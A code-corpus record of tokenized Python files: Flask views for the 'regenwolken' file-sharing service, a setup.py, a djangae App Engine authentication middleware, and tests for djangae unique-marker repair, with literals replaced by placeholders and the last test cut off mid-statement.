<s> from time import gmtime , strftime <EOL> from random import getrandbits <EOL> from os . path import basename <EOL> from base64 import standard_b64decode <EOL> from urllib import unquote <EOL> from urlparse import urlparse <EOL> from werkzeug import Response <EOL> from pymongo import DESCENDING <EOL> from flask import request , abort , jsonify , json , current_app , render_template , redirect <EOL> from regenwolken . utils import login , private , A1 , slug , thumbnail , clear , urlscheme <EOL> from regenwolken . specs import Item , Account , Drop <EOL> def index ( ) : <EOL> """<STR_LIT>""" <EOL> db , fs = current_app . db , current_app . fs <EOL> config , sessions = current_app . config , current_app . sessions <EOL> if request . method == '<STR_LIT:POST>' and not request . accept_mimetypes . accept_html : <EOL> try : <EOL> account = sessions . pop ( request . form . get ( '<STR_LIT:key>' ) ) [ '<STR_LIT>' ] <EOL> except KeyError : <EOL> abort ( <NUM_LIT> ) <EOL> acc = db . accounts . find_one ( { '<STR_LIT:email>' : account } ) <EOL> source = request . headers . get ( '<STR_LIT>' , '<STR_LIT>' ) . split ( '<STR_LIT:U+0020>' , <NUM_LIT:1> ) [ <NUM_LIT:0> ] <EOL> privacy = request . form . get ( '<STR_LIT>' , acc [ '<STR_LIT>' ] ) <EOL> _id = fs . upload_file ( config , account , request . files . get ( '<STR_LIT:file>' ) , source , privacy ) <EOL> items = acc [ '<STR_LIT>' ] <EOL> items . append ( _id ) <EOL> db . accounts . update ( { '<STR_LIT>' : acc [ '<STR_LIT>' ] } , { '<STR_LIT>' : { '<STR_LIT>' : items } } , upsert = False ) <EOL> obj = fs . get ( _id ) <EOL> if obj is None : <EOL> abort ( <NUM_LIT> ) <EOL> else : <EOL> return jsonify ( Item ( obj , config , urlscheme ( request ) ) ) <EOL> else : <EOL> users = db . accounts . find ( ) . count ( ) <EOL> files = fs . gfs . _GridFS__files . count ( ) <EOL> size = sum ( [ f [ '<STR_LIT>' ] for f in fs . gfs . _GridFS__files . find ( ) ] ) <EOL> hits = sum ( [ f [ '<STR_LIT>' ] for f in fs . mdb . 
find ( ) ] ) <EOL> if request . args . get ( '<STR_LIT>' ) == '<STR_LIT>' : <EOL> fields = [ ( '<STR_LIT>' , users ) , ( '<STR_LIT>' , files ) , ( '<STR_LIT:size>' , size ) , ( '<STR_LIT>' , hits ) ] <EOL> return Response ( '<STR_LIT:\n>' . join ( '<STR_LIT>' % field for field in fields ) , <NUM_LIT:200> ) <EOL> return Response ( render_template ( "<STR_LIT>" , ** locals ( ) ) , <NUM_LIT:200> , content_type = "<STR_LIT>" ) <EOL> @ login <EOL> def account ( ) : <EOL> """<STR_LIT>""" <EOL> conf , db = current_app . config , current_app . db <EOL> account = db . accounts . find_one ( { '<STR_LIT:email>' : request . authorization . username } ) <EOL> if request . method == '<STR_LIT:GET>' : <EOL> return jsonify ( clear ( account ) ) <EOL> try : <EOL> _id = account [ '<STR_LIT>' ] <EOL> data = json . loads ( request . data ) [ '<STR_LIT:user>' ] <EOL> except ValueError : <EOL> return ( '<STR_LIT>' , <NUM_LIT> ) <EOL> if len ( data . keys ( ) ) == <NUM_LIT:1> and '<STR_LIT>' in data : <EOL> db . accounts . update ( { '<STR_LIT>' : _id } , { '<STR_LIT>' : { '<STR_LIT>' : data [ '<STR_LIT>' ] } } ) <EOL> account [ '<STR_LIT>' ] = data [ '<STR_LIT>' ] <EOL> elif len ( data . keys ( ) ) == <NUM_LIT:2> and '<STR_LIT>' in data : <EOL> if not account [ '<STR_LIT>' ] == A1 ( account [ '<STR_LIT:email>' ] , data [ '<STR_LIT>' ] ) : <EOL> return abort ( <NUM_LIT> ) <EOL> if '<STR_LIT:email>' in data : <EOL> if filter ( lambda c : not c in conf [ '<STR_LIT>' ] , data [ '<STR_LIT:email>' ] ) or data [ '<STR_LIT:email>' ] . isdigit ( ) : <EOL> abort ( <NUM_LIT> ) <EOL> if db . accounts . find_one ( { '<STR_LIT:email>' : data [ '<STR_LIT:email>' ] } ) and account [ '<STR_LIT:email>' ] != data [ '<STR_LIT:email>' ] : <EOL> return ( '<STR_LIT>' , <NUM_LIT> ) <EOL> new = { '<STR_LIT:email>' : data [ '<STR_LIT:email>' ] , <EOL> '<STR_LIT>' : A1 ( data [ '<STR_LIT:email>' ] , data [ '<STR_LIT>' ] ) } <EOL> db . accounts . 
update ( { '<STR_LIT>' : _id } , { '<STR_LIT>' : new } ) <EOL> account [ '<STR_LIT:email>' ] = new [ '<STR_LIT:email>' ] <EOL> account [ '<STR_LIT>' ] = new [ '<STR_LIT>' ] <EOL> elif '<STR_LIT:password>' in data : <EOL> passwd = A1 ( account [ '<STR_LIT:email>' ] , data [ '<STR_LIT:password>' ] ) <EOL> db . accounts . update ( { '<STR_LIT>' : _id } , { '<STR_LIT>' : { '<STR_LIT>' : passwd } } ) <EOL> account [ '<STR_LIT>' ] = passwd <EOL> else : <EOL> abort ( <NUM_LIT> ) <EOL> db . accounts . update ( { '<STR_LIT>' : account [ '<STR_LIT>' ] } , { '<STR_LIT>' : <EOL> { '<STR_LIT>' : strftime ( '<STR_LIT>' , gmtime ( ) ) } } ) <EOL> return jsonify ( clear ( account ) ) <EOL> @ login <EOL> def account_stats ( ) : <EOL> """<STR_LIT>""" <EOL> email = request . authorization . username <EOL> items = current_app . db . accounts . find_one ( { '<STR_LIT:email>' : email } ) [ '<STR_LIT>' ] <EOL> views = <NUM_LIT:0> <EOL> for item in items : <EOL> views += current_app . db . items . find_one ( { '<STR_LIT>' : item } ) [ '<STR_LIT>' ] <EOL> return jsonify ( { '<STR_LIT>' : len ( items ) , '<STR_LIT>' : views } ) <EOL> @ login <EOL> def items ( ) : <EOL> """<STR_LIT>""" <EOL> db , fs = current_app . db , current_app . fs <EOL> ParseResult = urlparse ( request . url ) <EOL> params = { '<STR_LIT>' : '<STR_LIT:5>' , '<STR_LIT>' : '<STR_LIT:1>' , '<STR_LIT:type>' : None , '<STR_LIT>' : False , <EOL> '<STR_LIT:source>' : None } <EOL> if not ParseResult . query == '<STR_LIT>' : <EOL> query = dict ( [ part . split ( '<STR_LIT:=>' , <NUM_LIT:1> ) for part in ParseResult . query . split ( '<STR_LIT:&>' ) ] ) <EOL> params . update ( query ) <EOL> listing = [ ] <EOL> try : <EOL> pp = int ( params [ '<STR_LIT>' ] ) <EOL> page = int ( params [ '<STR_LIT>' ] ) <EOL> email = request . authorization . 
username <EOL> except ( ValueError , KeyError ) : <EOL> abort ( <NUM_LIT> ) <EOL> query = { '<STR_LIT>' : email } <EOL> if params [ '<STR_LIT:type>' ] != None : <EOL> query [ '<STR_LIT>' ] = params [ '<STR_LIT:type>' ] <EOL> if params [ '<STR_LIT>' ] == False : <EOL> query [ '<STR_LIT>' ] = None <EOL> if params [ '<STR_LIT:source>' ] != None : <EOL> query [ '<STR_LIT:source>' ] = { '<STR_LIT>' : '<STR_LIT>' + unquote ( params [ '<STR_LIT:source>' ] ) } <EOL> items = db . items . find ( query ) <EOL> for item in items . sort ( '<STR_LIT>' , DESCENDING ) [ pp * ( page - <NUM_LIT:1> ) : pp * page ] : <EOL> listing . append ( Item ( fs . get ( _id = item [ '<STR_LIT>' ] ) , <EOL> current_app . config , urlscheme ( request ) ) ) <EOL> return json . dumps ( listing [ : : - <NUM_LIT:1> ] ) <EOL> @ login <EOL> def items_new ( ) : <EOL> """<STR_LIT>""" <EOL> acc = current_app . db . accounts . find_one ( { '<STR_LIT:email>' : request . authorization . username } ) <EOL> ParseResult = urlparse ( request . url ) <EOL> privacy = '<STR_LIT>' if acc [ '<STR_LIT>' ] else '<STR_LIT>' <EOL> if not ParseResult . query == '<STR_LIT>' : <EOL> query = dict ( [ part . split ( '<STR_LIT:=>' , <NUM_LIT:1> ) for part in ParseResult . query . split ( '<STR_LIT:&>' ) ] ) <EOL> privacy = '<STR_LIT>' if query . get ( '<STR_LIT>' , None ) else '<STR_LIT>' <EOL> key = current_app . sessions . new ( request . authorization . username ) <EOL> res = { "<STR_LIT:url>" : urlscheme ( request ) + '<STR_LIT>' + current_app . config [ '<STR_LIT>' ] , <EOL> "<STR_LIT>" : current_app . config [ '<STR_LIT>' ] , <EOL> "<STR_LIT>" : { "<STR_LIT>" : privacy , <EOL> "<STR_LIT:key>" : key <EOL> } , <EOL> } <EOL> return jsonify ( res ) <EOL> @ private ( lambda req : req . accept_mimetypes . accept_html ) <EOL> def items_view ( short_id ) : <EOL> """<STR_LIT>""" <EOL> db , fs = current_app . db , current_app . fs <EOL> obj = fs . 
get ( short_id = short_id ) <EOL> if obj is None : <EOL> abort ( <NUM_LIT> ) <EOL> if request . accept_mimetypes . accept_html : <EOL> if getattr ( obj , '<STR_LIT>' , None ) : <EOL> abort ( <NUM_LIT> ) <EOL> if obj . item_type != '<STR_LIT:image>' : <EOL> fs . inc_count ( obj . _id ) <EOL> if obj . item_type == '<STR_LIT>' : <EOL> return redirect ( obj . redirect_url ) <EOL> drop = Drop ( obj , current_app . config , urlscheme ( request ) ) <EOL> if drop . item_type == '<STR_LIT:image>' : <EOL> return render_template ( '<STR_LIT>' , drop = drop ) <EOL> elif drop . item_type == '<STR_LIT:text>' : <EOL> return render_template ( '<STR_LIT>' , drop = drop ) <EOL> else : <EOL> return render_template ( '<STR_LIT>' , drop = drop ) <EOL> return jsonify ( Item ( obj , current_app . config , urlscheme ( request ) ) ) <EOL> @ login <EOL> def items_edit ( object_id ) : <EOL> """<STR_LIT>""" <EOL> conf , db , fs = current_app . config , current_app . db , current_app . fs <EOL> item = db . items . find_one ( { '<STR_LIT>' : request . authorization . username , <EOL> '<STR_LIT>' : object_id } ) <EOL> if not item : <EOL> abort ( <NUM_LIT> ) <EOL> if request . method == '<STR_LIT>' : <EOL> item [ '<STR_LIT>' ] = strftime ( '<STR_LIT>' , gmtime ( ) ) <EOL> elif request . method == '<STR_LIT>' : <EOL> try : <EOL> data = json . loads ( request . data ) [ '<STR_LIT>' ] <EOL> key , value = data . items ( ) [ <NUM_LIT:0> ] <EOL> if not key in [ '<STR_LIT>' , '<STR_LIT:name>' , '<STR_LIT>' ] : raise ValueError <EOL> except ValueError : <EOL> return ( '<STR_LIT>' , <NUM_LIT> ) <EOL> if key == '<STR_LIT:name>' and item [ '<STR_LIT>' ] != '<STR_LIT>' : <EOL> item [ '<STR_LIT:filename>' ] = value <EOL> elif key == '<STR_LIT>' and item [ '<STR_LIT>' ] == '<STR_LIT>' and value and not conf [ '<STR_LIT>' ] : <EOL> pass <EOL> else : <EOL> item [ key ] = value <EOL> item [ '<STR_LIT>' ] = strftime ( '<STR_LIT>' , gmtime ( ) ) <EOL> db . items . save ( item ) <EOL> item = fs . 
get ( item [ '<STR_LIT>' ] ) <EOL> return jsonify ( Item ( item , conf , urlscheme ( request ) ) ) <EOL> @ private ( lambda req : True ) <EOL> def blob ( short_id , filename ) : <EOL> """<STR_LIT>""" <EOL> fs = current_app . fs <EOL> obj = fs . get ( short_id = short_id ) <EOL> if obj is None or getattr ( obj , '<STR_LIT>' , None ) : <EOL> abort ( <NUM_LIT> ) <EOL> fs . inc_count ( obj . _id ) <EOL> if obj . item_type == '<STR_LIT>' : <EOL> return redirect ( obj . redirect_url ) <EOL> elif not obj . content_type . split ( '<STR_LIT:/>' , <NUM_LIT:1> ) [ <NUM_LIT:0> ] in [ '<STR_LIT:image>' , '<STR_LIT:text>' ] : <EOL> return Response ( obj , content_type = obj . content_type , headers = { '<STR_LIT>' : <EOL> '<STR_LIT>' % basename ( obj . filename ) } ) <EOL> return Response ( obj , content_type = obj . content_type ) <EOL> @ login <EOL> def trash ( ) : <EOL> """<STR_LIT>""" <EOL> empty = current_app . db . items . find ( <EOL> { '<STR_LIT>' : request . authorization . username , '<STR_LIT>' : { '<STR_LIT>' : None } } ) <EOL> for item in empty : <EOL> current_app . fs . delete ( item ) <EOL> return '<STR_LIT>' , <NUM_LIT:200> <EOL> def register ( ) : <EOL> """<STR_LIT>""" <EOL> conf , db = current_app . config , current_app . db <EOL> if len ( request . data ) > <NUM_LIT:200> : <EOL> return ( '<STR_LIT>' , <NUM_LIT> ) <EOL> try : <EOL> d = json . loads ( request . data ) <EOL> email = d [ '<STR_LIT:user>' ] [ '<STR_LIT:email>' ] <EOL> if email . isdigit ( ) : raise ValueError <EOL> passwd = d [ '<STR_LIT:user>' ] [ '<STR_LIT:password>' ] <EOL> except ( ValueError , KeyError ) : <EOL> return ( '<STR_LIT>' , <NUM_LIT> ) <EOL> if filter ( lambda c : not c in conf [ '<STR_LIT>' ] , email ) : <EOL> return ( '<STR_LIT>' , <NUM_LIT> ) <EOL> if db . accounts . find_one ( { '<STR_LIT:email>' : email } ) != None : <EOL> return ( '<STR_LIT>' , <NUM_LIT> ) <EOL> if not db . accounts . find_one ( { "<STR_LIT>" : "<STR_LIT>" } ) : <EOL> db . accounts . 
insert ( { "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : <NUM_LIT:1> } ) <EOL> account = Account ( { '<STR_LIT:email>' : email , '<STR_LIT>' : passwd , <EOL> '<STR_LIT:id>' : db . accounts . find_one ( { '<STR_LIT>' : '<STR_LIT>' } ) [ '<STR_LIT>' ] } , conf ) <EOL> db . accounts . update ( { '<STR_LIT>' : '<STR_LIT>' } , { '<STR_LIT>' : { '<STR_LIT>' : <NUM_LIT:1> } } ) <EOL> if conf [ '<STR_LIT>' ] : <EOL> account [ '<STR_LIT>' ] = strftime ( '<STR_LIT>' , gmtime ( ) ) <EOL> account [ '<STR_LIT>' ] = account [ '<STR_LIT:id>' ] <EOL> db . accounts . insert ( account ) <EOL> return ( jsonify ( clear ( account ) ) , <NUM_LIT> ) <EOL> @ login <EOL> def bookmark ( ) : <EOL> """<STR_LIT>""" <EOL> conf , db = current_app . config , current_app . db <EOL> def insert ( name , redirect_url ) : <EOL> acc = db . accounts . find_one ( { '<STR_LIT:email>' : request . authorization . username } ) <EOL> _id = str ( getrandbits ( <NUM_LIT:32> ) ) <EOL> retry_count = <NUM_LIT:1> <EOL> short_id_length = conf [ '<STR_LIT>' ] <EOL> while True : <EOL> short_id = slug ( short_id_length ) <EOL> if not db . items . find_one ( { '<STR_LIT>' : short_id } ) : <EOL> break <EOL> else : <EOL> retry_count += <NUM_LIT:1> <EOL> if retry_count > <NUM_LIT:3> : <EOL> short_id_length += <NUM_LIT:1> <EOL> retry_count = <NUM_LIT:1> <EOL> x = { <EOL> '<STR_LIT>' : request . authorization . username , <EOL> '<STR_LIT:name>' : name , <EOL> '<STR_LIT>' : _id , <EOL> '<STR_LIT>' : slug ( short_id_length ) , <EOL> '<STR_LIT>' : redirect_url , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : request . form . get ( '<STR_LIT>' , acc [ '<STR_LIT>' ] ) <EOL> if conf [ '<STR_LIT>' ] else False , <EOL> '<STR_LIT:source>' : request . headers . get ( '<STR_LIT>' , '<STR_LIT>' ) . 
split ( '<STR_LIT:U+0020>' , <NUM_LIT:1> ) [ <NUM_LIT:0> ] , <EOL> '<STR_LIT>' : strftime ( '<STR_LIT>' , gmtime ( ) ) , <EOL> '<STR_LIT>' : strftime ( '<STR_LIT>' , gmtime ( ) ) , <EOL> } <EOL> item = Item ( x , conf , urlscheme ( request ) ) <EOL> db . items . insert ( x ) <EOL> items = acc [ '<STR_LIT>' ] <EOL> items . append ( _id ) <EOL> db . accounts . update ( { '<STR_LIT>' : acc [ '<STR_LIT>' ] } , { '<STR_LIT>' : { '<STR_LIT>' : items } } , upsert = False ) <EOL> return item <EOL> try : <EOL> data = json . loads ( request . data ) <EOL> data = data [ '<STR_LIT>' ] <EOL> except ( ValueError , KeyError ) : <EOL> return ( '<STR_LIT>' , <NUM_LIT> ) <EOL> if isinstance ( data , list ) : <EOL> return json . dumps ( [ insert ( d [ '<STR_LIT:name>' ] , d [ '<STR_LIT>' ] ) for d in data ] ) <EOL> else : <EOL> return jsonify ( insert ( data [ '<STR_LIT:name>' ] , data [ '<STR_LIT>' ] ) ) <EOL> @ private ( lambda req : True ) <EOL> def thumb ( short_id ) : <EOL> """<STR_LIT>""" <EOL> rv = current_app . fs . get ( short_id = short_id ) <EOL> if rv is None or getattr ( obj , '<STR_LIT>' , None ) : <EOL> abort ( <NUM_LIT> ) <EOL> if rv . item_type == '<STR_LIT:image>' and current_app . config [ '<STR_LIT>' ] : <EOL> try : <EOL> th = thumbnail ( rv ) <EOL> return Response ( standard_b64decode ( th ) , <NUM_LIT:200> , content_type = '<STR_LIT>' ) <EOL> except IOError : <EOL> pass <EOL> return Response ( open ( '<STR_LIT>' % rv . item_type ) , <EOL> <NUM_LIT:200> , content_type = '<STR_LIT>' ) <EOL> def domains ( domain ) : <EOL> """<STR_LIT>""" <EOL> return jsonify ( { "<STR_LIT>" : "<STR_LIT>" % current_app . config [ '<STR_LIT>' ] } ) </s>
<s> from distutils . core import setup <EOL> with open ( '<STR_LIT>' , '<STR_LIT:r>' ) as readme : <EOL> LONG_DESCRIPTION = readme . read ( ) <EOL> setup ( name = '<STR_LIT>' , <EOL> version = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> requires = [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> packages = [ '<STR_LIT>' ] , <EOL> long_description = LONG_DESCRIPTION , <EOL> ) </s>
<s> from django . contrib . auth import authenticate , login , logout , get_user , BACKEND_SESSION_KEY , load_backend <EOL> from django . contrib . auth . middleware import AuthenticationMiddleware as DjangoMiddleware <EOL> from django . contrib . auth . models import BaseUserManager , AnonymousUser <EOL> from djangae . contrib . gauth . common . backends import BaseAppEngineUserAPIBackend <EOL> from google . appengine . api import users <EOL> class AuthenticationMiddleware ( DjangoMiddleware ) : <EOL> def process_request ( self , request ) : <EOL> django_user = get_user ( request ) <EOL> google_user = users . get_current_user ( ) <EOL> if django_user . is_authenticated ( ) : <EOL> backend_str = request . session . get ( BACKEND_SESSION_KEY ) <EOL> if ( not backend_str ) or not isinstance ( load_backend ( backend_str ) , BaseAppEngineUserAPIBackend ) : <EOL> request . user = django_user <EOL> return <EOL> if django_user . is_anonymous ( ) and google_user : <EOL> django_user = authenticate ( google_user = google_user ) or AnonymousUser ( ) <EOL> if django_user . is_authenticated ( ) : <EOL> login ( request , django_user ) <EOL> if django_user . is_authenticated ( ) : <EOL> if not google_user : <EOL> logout ( request ) <EOL> django_user = AnonymousUser ( ) <EOL> elif django_user . username != google_user . user_id ( ) : <EOL> logout ( request ) <EOL> django_user = authenticate ( google_user = google_user ) or AnonymousUser ( ) <EOL> if django_user . is_authenticated ( ) : <EOL> login ( request , django_user ) <EOL> if django_user . is_authenticated ( ) : <EOL> is_superuser = users . is_current_user_admin ( ) <EOL> resave = False <EOL> if is_superuser != django_user . is_superuser : <EOL> django_user . is_superuser = django_user . is_staff = is_superuser <EOL> resave = True <EOL> if django_user . email != google_user . email ( ) : <EOL> django_user . email = google_user . email ( ) <EOL> resave = True <EOL> if resave : <EOL> django_user . save ( ) <EOL> request . 
user = django_user </s>
<s> from hashlib import md5 <EOL> from django . db import models <EOL> from django . conf import settings <EOL> from unittest import skipIf <EOL> from google . appengine . api import datastore , datastore_errors <EOL> from . models import UniqueAction , encode_model <EOL> from djangae . test import TestCase , process_task_queues <EOL> from djangae . db . constraints import UniqueMarker , UniquenessMixin <EOL> DEFAULT_NAMESPACE = settings . DATABASES . get ( "<STR_LIT:default>" , { } ) . get ( "<STR_LIT>" ) <EOL> class TestModel ( UniquenessMixin , models . Model ) : <EOL> name = models . CharField ( max_length = <NUM_LIT:32> , unique = True ) <EOL> counter1 = models . IntegerField ( ) <EOL> counter2 = models . IntegerField ( ) <EOL> class Meta : <EOL> unique_together = [ ( '<STR_LIT>' , '<STR_LIT>' ) ] <EOL> class MapperTests ( TestCase ) : <EOL> def setUp ( self ) : <EOL> super ( MapperTests , self ) . setUp ( ) <EOL> self . i1 = TestModel . objects . create ( name = "<STR_LIT>" , counter1 = <NUM_LIT:1> , counter2 = <NUM_LIT:1> ) <EOL> self . i2 = TestModel . objects . create ( name = "<STR_LIT>" , counter1 = <NUM_LIT:1> , counter2 = <NUM_LIT:2> ) <EOL> self . i3 = self . i4 = None <EOL> def tearDown ( self ) : <EOL> if self . i3 : <EOL> self . i3 . delete ( ) <EOL> if self . i4 : <EOL> self . i4 . delete ( ) <EOL> super ( MapperTests , self ) . tearDown ( ) <EOL> def test_check_ok ( self ) : <EOL> UniqueAction . objects . create ( action_type = "<STR_LIT>" , model = encode_model ( TestModel ) ) <EOL> process_task_queues ( ) <EOL> a = UniqueAction . objects . get ( ) <EOL> self . assertEqual ( a . status , "<STR_LIT>" ) <EOL> self . assertEqual ( <NUM_LIT:0> , a . actionlog_set . count ( ) ) <EOL> def test_check_missing_markers ( self ) : <EOL> marker1 = "<STR_LIT>" . format ( TestModel . _meta . db_table , md5 ( self . i2 . name ) . hexdigest ( ) ) <EOL> marker_key = datastore . Key . from_path ( UniqueMarker . 
kind ( ) , marker1 , namespace = DEFAULT_NAMESPACE ) <EOL> datastore . Delete ( marker_key ) <EOL> UniqueAction . objects . create ( action_type = "<STR_LIT>" , model = encode_model ( TestModel ) ) <EOL> process_task_queues ( ) <EOL> a = UniqueAction . objects . get ( ) <EOL> self . assertEqual ( a . status , "<STR_LIT>" ) <EOL> self . assertEqual ( <NUM_LIT:1> , a . actionlog_set . count ( ) ) <EOL> error = a . actionlog_set . all ( ) [ <NUM_LIT:0> ] <EOL> instance_key = datastore . Key . from_path ( TestModel . _meta . db_table , self . i2 . pk , namespace = DEFAULT_NAMESPACE ) <EOL> self . assertEqual ( error . log_type , "<STR_LIT>" ) <EOL> self . assertEqual ( error . instance_key , str ( instance_key ) ) <EOL> self . assertEqual ( error . marker_key , str ( marker_key ) ) <EOL> def test_check_missing_instance_attr ( self ) : <EOL> marker1 = "<STR_LIT>" . format ( TestModel . _meta . db_table , md5 ( self . i2 . name ) . hexdigest ( ) ) <EOL> marker_key = datastore . Key . from_path ( UniqueMarker . kind ( ) , marker1 , namespace = DEFAULT_NAMESPACE ) <EOL> marker = datastore . Get ( marker_key ) <EOL> marker [ '<STR_LIT>' ] = None <EOL> datastore . Put ( marker ) <EOL> UniqueAction . objects . create ( action_type = "<STR_LIT>" , model = encode_model ( TestModel ) ) <EOL> process_task_queues ( ) <EOL> a = UniqueAction . objects . get ( ) <EOL> self . assertEqual ( a . status , "<STR_LIT>" ) <EOL> self . assertEqual ( <NUM_LIT:1> , a . actionlog_set . count ( ) ) <EOL> error = a . actionlog_set . all ( ) [ <NUM_LIT:0> ] <EOL> instance_key = datastore . Key . from_path ( TestModel . _meta . db_table , self . i2 . pk , namespace = DEFAULT_NAMESPACE ) <EOL> self . assertEqual ( error . log_type , "<STR_LIT>" ) <EOL> self . assertEqual ( error . instance_key , str ( instance_key ) ) <EOL> self . assertEqual ( error . marker_key , str ( marker_key ) ) <EOL> def test_repair_missing_markers ( self ) : <EOL> instance_key = datastore . Key . from_path ( TestModel . 
_meta . db_table , self . i2 . pk , namespace = DEFAULT_NAMESPACE ) <EOL> marker1 = "<STR_LIT>" . format ( TestModel . _meta . db_table , md5 ( self . i2 . name ) . hexdigest ( ) ) <EOL> marker_key = datastore . Key . from_path ( UniqueMarker . kind ( ) , marker1 , namespace = DEFAULT_NAMESPACE ) <EOL> datastore . Delete ( marker_key ) <EOL> UniqueAction . objects . create ( action_type = "<STR_LIT>" , model = encode_model ( TestModel ) ) <EOL> process_task_queues ( ) <EOL> a = UniqueAction . objects . get ( ) <EOL> self . assertEqual ( a . status , "<STR_LIT>" ) <EOL> self . assertEqual ( <NUM_LIT:0> , a . actionlog_set . count ( ) ) <EOL> marker = datastore . Get ( marker_key ) <EOL> self . assertTrue ( marker ) <EOL> self . assertTrue ( isinstance ( marker [ "<STR_LIT>" ] , datastore . Key ) ) <EOL> self . assertEqual ( instance_key , marker [ "<STR_LIT>" ] ) <EOL> self . assertTrue ( marker [ "<STR_LIT>" ] ) <EOL> def test_check_old_style_marker ( self ) : <EOL> instance_key = datastore . Key . from_path ( TestModel . _meta . db_table , self . i2 . pk , namespace = DEFAULT_NAMESPACE ) <EOL> marker1 = "<STR_LIT>" . format ( TestModel . _meta . db_table , md5 ( self . i2 . name ) . hexdigest ( ) ) <EOL> marker_key = datastore . Key . from_path ( UniqueMarker . kind ( ) , marker1 , namespace = DEFAULT_NAMESPACE ) <EOL> marker = datastore . Get ( marker_key ) <EOL> marker [ '<STR_LIT>' ] = str ( instance_key ) <EOL> datastore . Put ( marker ) <EOL> UniqueAction . objects . create ( action_type = "<STR_LIT>" , model = encode_model ( TestModel ) ) <EOL> process_task_queues ( ) <EOL> a = UniqueAction . objects . get ( ) <EOL> self . assertEqual ( a . status , "<STR_LIT>" ) <EOL> self . assertEqual ( <NUM_LIT:1> , a . actionlog_set . count ( ) ) <EOL> error = a . actionlog_set . all ( ) [ <NUM_LIT:0> ] <EOL> self . assertEqual ( error . log_type , "<STR_LIT>" ) <EOL> self . assertEqual ( error . instance_key , str ( instance_key ) ) <EOL> self . assertEqual ( error . 
marker_key , str ( marker_key ) ) <EOL> def test_repair_old_style_marker ( self ) : <EOL> instance_key = datastore . Key . from_path ( TestModel . _meta . db_table , self . i2 . pk , namespace = DEFAULT_NAMESPACE ) <EOL> marker1 = "<STR_LIT>" . format ( TestModel . _meta . db_table , md5 ( self . i2 . name ) . hexdigest ( ) ) <EOL> marker_key = datastore . Key . from_path ( UniqueMarker . kind ( ) , marker1 , namespace = DEFAULT_NAMESPACE ) <EOL> marker = datastore . Get ( marker_key ) <EOL> marker [ '<STR_LIT>' ] = str ( instance_key ) <EOL> datastore . Put ( marker ) <EOL> UniqueAction . objects . create ( action_type = "<STR_LIT>" , model = encode_model ( TestModel ) ) <EOL> process_task_queues ( ) <EOL> a = UniqueAction . objects . get ( ) <EOL> self . assertEqual ( a . status , "<STR_LIT>" ) <EOL> self . assertEqual ( <NUM_LIT:0> , a . actionlog_set . count ( ) ) <EOL> marker = datastore . Get ( marker_key ) <EOL> self . assertTrue ( marker ) <EOL> self . assertEqual ( marker [ '<STR_LIT>' ] , instance_key ) <EOL> def test_repair_missing_instance_attr ( self ) : <EOL> instance_key = datastore . Key . from_path ( TestModel . _meta . db_table , self . i2 . pk , namespace = DEFAULT_NAMESPACE ) <EOL> marker1 = "<STR_LIT>" . format ( TestModel . _meta . db_table , md5 ( self . i2 . name ) . hexdigest ( ) ) <EOL> marker_key = datastore . Key . from_path ( UniqueMarker . kind ( ) , marker1 , namespace = DEFAULT_NAMESPACE ) <EOL> marker = datastore . Get ( marker_key ) <EOL> marker [ '<STR_LIT>' ] = None <EOL> datastore . Put ( marker ) <EOL> UniqueAction . objects . create ( action_type = "<STR_LIT>" , model = encode_model ( TestModel ) ) <EOL> process_task_queues ( ) <EOL> a = UniqueAction . objects . get ( ) <EOL> self . assertEqual ( a . status , "<STR_LIT>" ) <EOL> self . assertEqual ( <NUM_LIT:0> , a . actionlog_set . count ( ) ) <EOL> marker = datastore . Get ( marker_key ) <EOL> self . assertTrue ( marker ) <EOL> self . 
assertEqual ( marker [ '<STR_LIT>' ] , instance_key ) <EOL> def test_clean_after_instance_deleted ( self ) : <EOL> marker1 = "<STR_LIT>" . format ( TestModel . _meta . db_table , md5 ( self . i1 . name ) . hexdigest ( ) ) <EOL> marker_key = datastore . Key . from_path ( UniqueMarker . kind ( ) , marker1 , namespace = DEFAULT_NAMESPACE ) <EOL> self . assertTrue ( datastore . Get ( marker_key ) ) <EOL> datastore . Delete ( datastore . Key . from_path ( TestModel . _meta . db_table , self . i1 . pk , namespace = DEFAULT_NAMESPACE ) ) <EOL> self . assertTrue ( datastore . Get ( marker_key ) ) <EOL> UniqueAction . objects . create ( action_type = "<STR_LIT>" , model = encode_model ( TestModel ) ) <EOL> process_task_queues ( ) <EOL> self . assertRaises ( datastore_errors . EntityNotFoundError , datastore . Get , marker_key ) <EOL> def test_clean_removes_markers_with_different_values ( self ) : <EOL> marker1 = "<STR_LIT>" . format ( TestModel . _meta . db_table , md5 ( self . i1 . name ) . hexdigest ( ) ) <EOL> marker_key = datastore . Key . from_path ( UniqueMarker . kind ( ) , marker1 , namespace = DEFAULT_NAMESPACE ) <EOL> original_marker = datastore . Get ( marker_key ) <EOL> marker2 = "<STR_LIT>" . format ( TestModel . _meta . db_table , md5 ( "<STR_LIT>" ) . hexdigest ( ) ) <EOL> new_marker = datastore . Entity ( UniqueMarker . kind ( ) , name = marker2 , namespace = DEFAULT_NAMESPACE ) <EOL> new_marker . update ( original_marker ) <EOL> datastore . Put ( new_marker ) <EOL> UniqueAction . objects . create ( action_type = "<STR_LIT>" , model = encode_model ( TestModel ) ) <EOL> process_task_queues ( ) <EOL> self . assertRaises ( datastore_errors . EntityNotFoundError , datastore . Get , new_marker . key ( ) ) <EOL> self . assertTrue ( datastore . Get ( marker_key ) ) <EOL> @ skipIf ( "<STR_LIT>" not in settings . DATABASES , "<STR_LIT>" ) <EOL> def test_clean_removes_markers_with_different_values_on_non_default_namespace ( self ) : <EOL> self . i3 = TestModel . 
